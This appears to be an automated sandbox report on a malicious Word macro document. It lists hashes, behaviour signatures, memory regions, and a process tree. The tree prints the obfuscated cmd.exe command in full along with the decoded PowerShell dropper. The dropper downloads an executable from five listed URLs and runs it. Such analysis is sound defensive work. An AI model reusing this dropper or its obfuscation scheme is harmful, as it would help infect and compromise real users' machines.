Analysis

  • max time kernel
    101s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    29-08-2024 15:27

General

  • Target

    c918f47fda0745fedaca86195397ace0_JaffaCakes118.doc

  • Size

    248KB

  • MD5

    c918f47fda0745fedaca86195397ace0

  • SHA1

    90367cd9c7d83d6028e0125123541a138c5a82d6

  • SHA256

    7af935b7cd7ddc1383ca817ba41f0784340459331754fcdfa4348fc2a2fe7813

  • SHA512

    894663307c2bc59f31ac3fd5ae6934971dd8b7beebbbcb18de5d020ad43309baf8a1012662c33b195dc1bd3bfcaae45a87e5b5ef396cb58d0e56f0956fb781ac

  • SSDEEP

    3072:BO4ZAi7XnrA+Tj7/tKXYAO+aqjL/xSu90OoiLuDKZXfwKeljR17:BOCA83rA+Tj7lKYMa4xUOmD+XfwLH

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://ttobus.com/ZtzZFiHGL_r

exe.dropper

http://bilanacc.com/P7BuwLoQsTjP0hBVF

exe.dropper

http://gclubfan.com/ahjpTwNsvu2X_Q7h

exe.dropper

http://katariahospital.com/tquLevYG

exe.dropper

http://pjfittedkitchens.com/uerfWET_jrbze

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\c918f47fda0745fedaca86195397ace0_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1724
    • \??\c:\windows\SysWOW64\cmd.exe
      c:\tiqdul\ncjld\jwcpob\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set gN=xepg'bE-QWi$d3=t1YG/Mzn}(Dwl:4\5~hUZPC{AmIL%76uXf y0Nkj+S;BO)a@TqF_.2sHv,c9oVr&&for %4 in (2,75,26,43,36,34,58,42,41,37,28,32,31,72,16,43,77,43,56,6,56,56,41,59,52,52,39,20,6,28,32,7,29,72,16,43,33,43,63,6,20,36,28,32,7,13,72,16,43,27,27,49,11,54,33,40,12,2,14,4,54,48,69,71,10,69,40,4,57,11,12,48,26,75,54,14,22,1,26,7,75,5,54,1,73,15,49,52,1,15,67,9,1,5,37,27,10,1,22,15,57,11,48,10,10,54,61,14,4,33,15,15,2,28,19,19,15,15,75,5,46,69,67,73,75,40,19,35,15,21,35,65,10,70,18,42,66,77,62,33,15,15,2,28,19,19,5,10,27,61,22,61,73,73,67,73,75,40,19,36,44,58,46,26,42,75,8,69,63,54,36,51,33,58,76,65,62,33,15,15,2,28,19,19,3,73,27,46,5,48,61,22,67,73,75,40,19,61,33,54,2,63,26,52,69,71,46,68,47,66,8,44,33,62,33,15,15,2,28,19,19,53,61,15,61,77,10,61,33,75,69,2,10,15,61,27,67,73,75,40,19,15,64,46,42,1,71,17,18,62,33,15,15,2,28,19,19,2,54,48,10,15,15,1,12,53,10,15,73,33,1,22,69,67,73,75,40,19,46,1,77,48,9,6,63,66,54,77,5,21,1,4,67,56,2,27,10,15,24,4,62,4,60,57,11,64,73,10,73,54,5,54,14,4,15,26,75,64,2,10,4,57,11,64,69,69,48,61,49,14,49,4,74,74,45,4,57,11,33,5,40,26,54,53,10,14,4,71,5,40,10,2,71,26,4,57,11,15,10,22,21,64,14,11,1,22,71,28,15,1,40,2,55,4,30,4,55,11,64,69,69,48,61,55,4,67,1,0,1,4,57,48,75,77,1,61,73,33,24,11,22,10,21,5,26,49,10,22,49,11,48,10,10,54,61,60,38,15,77,50,38,11,12,48,26,75,54,67,25,75,26,22,27,75,61,12,65,10,27,1,24,11,22,10,21,5,26,72,49,11,15,10,22,21,64,60,57,11,26,71,69,48,26,14,4,26,21,10,64,64,22,4,57,41,48,49,24,24,18,1,15,7,41,15,1,40,49,11,15,10,22,21,64,60,67,27,1,22,3,15,33,49,7,3,1,49,29,51,51,51,51,60,49,38,41,22,71,75,53,1,7,41,15,1,40,49,11,15,10,22,21,64,57,11,71,48,15,33,77,15,15,14,4,73,75,75,73,2,10,69,4,57,5,77,1,61,53,57,23,23,73,61,15,73,33,38,23,23,11,61,12,64,10,5,73,14,4,22,27,26,26,10,33,4,57,78)do set WM=!WM!!gN:~%4,1!&&if %4 gtr 77 echo !WM:*WM!=!|%CommonProgramFiles(x86):~23,1%m%ALLUSERSPROFILE:~-4,-3% "
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2780
      • C:\Windows\SysWOW64\cmd.exe
        CmD /V:O/C"set gN=xepg'bE-QWi$d3=t1YG/Mzn}(Dwl:4\5~hUZPC{AmIL%76uXf y0Nkj+S;BO)a@TqF_.2sHv,c9oVr&&for %4 in (2,75,26,43,36,34,58,42,41,37,28,32,31,72,16,43,77,43,56,6,56,56,41,59,52,52,39,20,6,28,32,7,29,72,16,43,33,43,63,6,20,36,28,32,7,13,72,16,43,27,27,49,11,54,33,40,12,2,14,4,54,48,69,71,10,69,40,4,57,11,12,48,26,75,54,14,22,1,26,7,75,5,54,1,73,15,49,52,1,15,67,9,1,5,37,27,10,1,22,15,57,11,48,10,10,54,61,14,4,33,15,15,2,28,19,19,15,15,75,5,46,69,67,73,75,40,19,35,15,21,35,65,10,70,18,42,66,77,62,33,15,15,2,28,19,19,5,10,27,61,22,61,73,73,67,73,75,40,19,36,44,58,46,26,42,75,8,69,63,54,36,51,33,58,76,65,62,33,15,15,2,28,19,19,3,73,27,46,5,48,61,22,67,73,75,40,19,61,33,54,2,63,26,52,69,71,46,68,47,66,8,44,33,62,33,15,15,2,28,19,19,53,61,15,61,77,10,61,33,75,69,2,10,15,61,27,67,73,75,40,19,15,64,46,42,1,71,17,18,62,33,15,15,2,28,19,19,2,54,48,10,15,15,1,12,53,10,15,73,33,1,22,69,67,73,75,40,19,46,1,77,48,9,6,63,66,54,77,5,21,1,4,67,56,2,27,10,15,24,4,62,4,60,57,11,64,73,10,73,54,5,54,14,4,15,26,75,64,2,10,4,57,11,64,69,69,48,61,49,14,49,4,74,74,45,4,57,11,33,5,40,26,54,53,10,14,4,71,5,40,10,2,71,26,4,57,11,15,10,22,21,64,14,11,1,22,71,28,15,1,40,2,55,4,30,4,55,11,64,69,69,48,61,55,4,67,1,0,1,4,57,48,75,77,1,61,73,33,24,11,22,10,21,5,26,49,10,22,49,11,48,10,10,54,61,60,38,15,77,50,38,11,12,48,26,75,54,67,25,75,26,22,27,75,61,12,65,10,27,1,24,11,22,10,21,5,26,72,49,11,15,10,22,21,64,60,57,11,26,71,69,48,26,14,4,26,21,10,64,64,22,4,57,41,48,49,24,24,18,1,15,7,41,15,1,40,49,11,15,10,22,21,64,60,67,27,1,22,3,15,33,49,7,3,1,49,29,51,51,51,51,60,49,38,41,22,71,75,53,1,7,41,15,1,40,49,11,15,10,22,21,64,57,11,71,48,15,33,77,15,15,14,4,73,75,75,73,2,10,69,4,57,5,77,1,61,53,57,23,23,73,61,15,73,33,38,23,23,11,61,12,64,10,5,73,14,4,22,27,26,26,10,33,4,57,78)do set WM=!WM!!gN:~%4,1!&&if %4 gtr 77 echo !WM:*WM!=!|CmD "
        3⤵
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1096
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $jhmdp='jfsvism';$dfwoj=new-object Net.WebClient;$fiija='http://ttobus.com/ZtzZFiHGL_r@http://bilanacc.com/P7BuwLoQsTjP0hBVF@http://gclubfan.com/ahjpTwNsvu2X_Q7h@http://katariahospital.com/tquLevYG@http://pjfittedkitchens.com/uerfWET_jrbze'.Split('@');$qcicjbj='twoqpi';$qssfa = '996';$hbmwjki='vbmipvw';$tinzq=$env:temp+'\'+$qssfa+'.exe';foreach($nizbw in $fiija){try{$dfwoj.DownloadFile($nizbw, $tinzq);$wvsfw='wziqqn';If ((Get-Item $tinzq).length -ge 40000) {Invoke-Item $tinzq;$vfthrtt='coocpis';break;}}catch{}}$adqibc='nlwwih';"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2980
        • C:\Windows\SysWOW64\cmd.exe
          CmD
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2924
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell $jhmdp='jfsvism';$dfwoj=new-object Net.WebClient;$fiija='http://ttobus.com/ZtzZFiHGL_r@http://bilanacc.com/P7BuwLoQsTjP0hBVF@http://gclubfan.com/ahjpTwNsvu2X_Q7h@http://katariahospital.com/tquLevYG@http://pjfittedkitchens.com/uerfWET_jrbze'.Split('@');$qcicjbj='twoqpi';$qssfa = '996';$hbmwjki='vbmipvw';$tinzq=$env:temp+'\'+$qssfa+'.exe';foreach($nizbw in $fiija){try{$dfwoj.DownloadFile($nizbw, $tinzq);$wvsfw='wziqqn';If ((Get-Item $tinzq).length -ge 40000) {Invoke-Item $tinzq;$vfthrtt='coocpis';break;}}catch{}}$adqibc='nlwwih';
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2160
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2272

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      9249955c958ebbb5d1967020abd5021c

      SHA1

      08ca7648bd0ae4fa60d68e07bffafa0661739a89

      SHA256

      d488150e9503a40c59a625c5f472ee5daee6c7517c796492a37a88c8dd68e27c

      SHA512

      f6266477f6d2ff8086fd6155db7d59b616696a06983bb0deaf4c5e972edff6c2664b4911591204abba3695f01e85f67355d9c8598ab1c7c36a111f57f3abc2df

    • memory/1724-88-0x0000000005390000-0x0000000005490000-memory.dmp

      Filesize

      1024KB

    • memory/1724-67-0x0000000005390000-0x0000000005490000-memory.dmp

      Filesize

      1024KB

    • memory/1724-86-0x0000000005390000-0x0000000005490000-memory.dmp

      Filesize

      1024KB

    • memory/1724-85-0x0000000005390000-0x0000000005490000-memory.dmp

      Filesize

      1024KB

    • memory/1724-17-0x0000000006A10000-0x0000000006B10000-memory.dmp

      Filesize

      1024KB

    • memory/1724-16-0x0000000005390000-0x0000000005490000-memory.dmp

      Filesize

      1024KB

    • memory/1724-89-0x0000000005390000-0x0000000005490000-memory.dmp

      Filesize

      1024KB

    • memory/1724-0-0x000000002F5F1000-0x000000002F5F2000-memory.dmp

      Filesize

      4KB

    • memory/1724-122-0x0000000070D3D000-0x0000000070D48000-memory.dmp

      Filesize

      44KB

    • memory/1724-2-0x0000000070D3D000-0x0000000070D48000-memory.dmp

      Filesize

      44KB

    • memory/1724-58-0x0000000005390000-0x0000000005490000-memory.dmp

      Filesize

      1024KB

    • memory/1724-96-0x0000000005390000-0x0000000005490000-memory.dmp

      Filesize

      1024KB

    • memory/1724-97-0x0000000070D3D000-0x0000000070D48000-memory.dmp

      Filesize

      44KB

    • memory/1724-98-0x0000000005390000-0x0000000005490000-memory.dmp

      Filesize

      1024KB

    • memory/1724-99-0x0000000005390000-0x0000000005490000-memory.dmp

      Filesize

      1024KB

    • memory/1724-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1724-121-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1724-87-0x0000000005390000-0x0000000005490000-memory.dmp

      Filesize

      1024KB